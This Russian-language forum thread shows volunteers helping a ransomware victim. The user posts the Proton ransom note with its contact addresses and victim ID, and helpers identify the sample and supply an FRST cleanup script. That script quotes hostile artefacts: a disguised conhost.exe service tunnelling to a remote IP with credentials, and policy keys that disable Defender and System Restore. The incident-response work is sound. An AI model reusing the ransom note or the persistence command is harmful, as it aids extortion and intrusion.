proton Поймал шифровальщик, помогите

[Madser]

Добрый день. Вчера или позовчера словил вирус шифровальщик 

Вот текст записки 

 

Warning: Your files have been stolen and encrypted.

If you want your files back, contact us at the email addresses shown below:

Email: joedecryption@gmail.com
Telegram: @joedecryption

# In subject line please write your personal ID
ID: 0CC4841421D393CDA0B009A916A4DAD3

Warning: You will receive a discount if you contact us within 24 hours of decryption - Strictly try to avoid scam brokers or decryption companies, as they will only waste your money.

Check Your Spam Folder: After sending your emails, please check your spam/junk folder
regularly to ensure you do not miss our response.

No Response After 24 Hours: If you do not receive a reply from us within 24 hours,
please create a new, valid email address (e.g., from Gmail, Outlook, etc.)
and send your message again using the new email address.

P.S : No one but us has the ability to decrypt your files.

 

 

[Madser]

Забыл про файлы 

добавил в архив Пароль virus

virus.rar

[Sandor]

Здравствуйте!

 

Прочтите и выполните Порядок оформления запроса о помощи

[Madser]

Добавил

FRST.txt Addition.txt

[Sandor]

Сам файл C:\Helper.txt тоже прикрепите, пожалуйста.

[Madser]

Helper.txt

[Sandor]

Спасибо, некоторое время подождите.

[safety]

Если систему сканировали в KVRT добавьте отчеты из папки Reports, в архиве, без пароля

2026-02-07 23:41 - 2023-09-04 15:46 - 000000000 ____D C:\KVRT2020_Data

 

[Madser]

8 минут назад, safety сказал:

Если систему сканировали в KVRT добавьте отчеты из папки Reports, в архиве, без пароля

2026-02-07 23:41 - 2023-09-04 15:46 - 000000000 ____D C:\KVRT2020_Data

 

Не сканировал

[safety]

Этот файл добавьте в архив с паролем virus, архив загрузите в ваше сообщение.

C:\Windows\SysWOW64\conhost.exe

+

проверьте что в этой папке

2026-02-07 23:36 - 2026-02-07 23:42 - 000000000 ____D C:\Users\DefaultAccount\Desktop\toold

 

Изменено 9 февраля пользователем safety

[Madser]

ссылка на файл https://disk.yandex.ru/d/owtXdihSdr0UpQ

 

Содержимое папки

[safety]

Всю папку

C:\Users\DefaultAccount\Desktop\toold

заархивируйте с паролем virus, загрузите на облачный диск, и дайте ссылку на скачивание здесь

 

13 минут назад, Madser сказал:

ссылка на файл https://disk.yandex.ru/d/owtXdihSdr0UpQ

по файлу:

Файл подозрительный.

https://www.virustotal.com/gui/file/e214aeaf13b9dcdbf33f167d2a6b578564cb5ce4931e983b6dc193d8f6cae34e?nocache=1

Если вы не устанавливали данное ПО, то лучше его закрыть, или удалить.

По очистке системы:

 

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы

Start::
() [Файл не подписан] C:\Windows\SysWOW64\conhost.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableConfig] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKLM\...\Policies\system: [legalnoticecaption] Your computer is encrypted
HKLM\...\Policies\system: [legalnoticetext] We encrypted and stolen all of your files.
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
S2 WinConhost; cmd /c start c:\windows\sysWOW64\conhost.exe -L=WinSync:o478peEr3D@89.108.90.208:35812 [X] <==== ВНИМАНИЕ
2026-02-07 23:42 - 2026-02-07 23:42 - 004403254 _____ C:\ProgramData\0CC4841421D393CDA0B009A916A4DAD3.bmp
2026-02-07 23:42 - 2026-02-07 23:42 - 000000889 _____ C:\Users\Public\Helper.txt
2026-02-07 23:36 - 2026-02-07 23:42 - 000000000 ____D C:\Users\DefaultAccount\Desktop\toold
S2 WinConhost; cmd /c start c:\windows\sysWOW64\conhost.exe -L=WinSync:o478peEr3D@89.108.90.208:35812 [X] <==== ВНИМАНИЕ
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Папку C:\FRST\Quarantine заархивируйте с паролем virus, архив загрузите на облачный диск, и дайте ссылку на скачивание здесь

[Madser]

15 минут назад, safety сказал:

Всю папку

C:\Users\DefaultAccount\Desktop\toold

заархивируйте с паролем virus, загрузите на облачный диск, и дайте ссылку на скачивание здесь

 

по файлу:

Файл подозрительный.

https://www.virustotal.com/gui/file/e214aeaf13b9dcdbf33f167d2a6b578564cb5ce4931e983b6dc193d8f6cae34e?nocache=1

Если вы не устанавливали данное ПО, то лучше его закрыть, или удалить.

Архв загружен, ссылка удалена.

Изменено 9 февраля пользователем safety
Архв загружен, ссылка удалена.

[safety]

10 минут назад, Madser сказал:

Архв загружен, ссылка удалена.

Спасибо, то что надо. Теперь чистим систему в FRST

По файлу Stub.vexe - это Proton

#Proton / #Shinra #Ransomware

https://www.virustotal.com/gui/file/6aa1db14d96421b4948b81b12ae140acc6ef2b2a1f4cd634b546a9a7bc14b623/detection

Изменено 9 февраля пользователем safety

[Madser]

54 минуты назад, safety сказал:

Всю папку

C:\Users\DefaultAccount\Desktop\toold

заархивируйте с паролем virus, загрузите на облачный диск, и дайте ссылку на скачивание здесь

 

по файлу:

Файл подозрительный.

https://www.virustotal.com/gui/file/e214aeaf13b9dcdbf33f167d2a6b578564cb5ce4931e983b6dc193d8f6cae34e?nocache=1

Если вы не устанавливали данное ПО, то лучше его закрыть, или удалить.

По очистке системы:

 

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы

Start::
() [Файл не подписан] C:\Windows\SysWOW64\conhost.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableConfig] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKLM\...\Policies\system: [legalnoticecaption] Your computer is encrypted
HKLM\...\Policies\system: [legalnoticetext] We encrypted and stolen all of your files.
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
S2 WinConhost; cmd /c start c:\windows\sysWOW64\conhost.exe -L=WinSync:o478peEr3D@89.108.90.208:35812 [X] <==== ВНИМАНИЕ
2026-02-07 23:42 - 2026-02-07 23:42 - 004403254 _____ C:\ProgramData\0CC4841421D393CDA0B009A916A4DAD3.bmp
2026-02-07 23:42 - 2026-02-07 23:42 - 000000889 _____ C:\Users\Public\Helper.txt
2026-02-07 23:36 - 2026-02-07 23:42 - 000000000 ____D C:\Users\DefaultAccount\Desktop\toold
S2 WinConhost; cmd /c start c:\windows\sysWOW64\conhost.exe -L=WinSync:o478peEr3D@89.108.90.208:35812 [X] <==== ВНИМАНИЕ
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Папку C:\FRST\Quarantine заархивируйте с паролем virus, архив загрузите на облачный диск, и дайте ссылку на скачивание здесь

архив загружен, ссылка удалена

Fixlog.txt

Изменено 9 февраля пользователем safety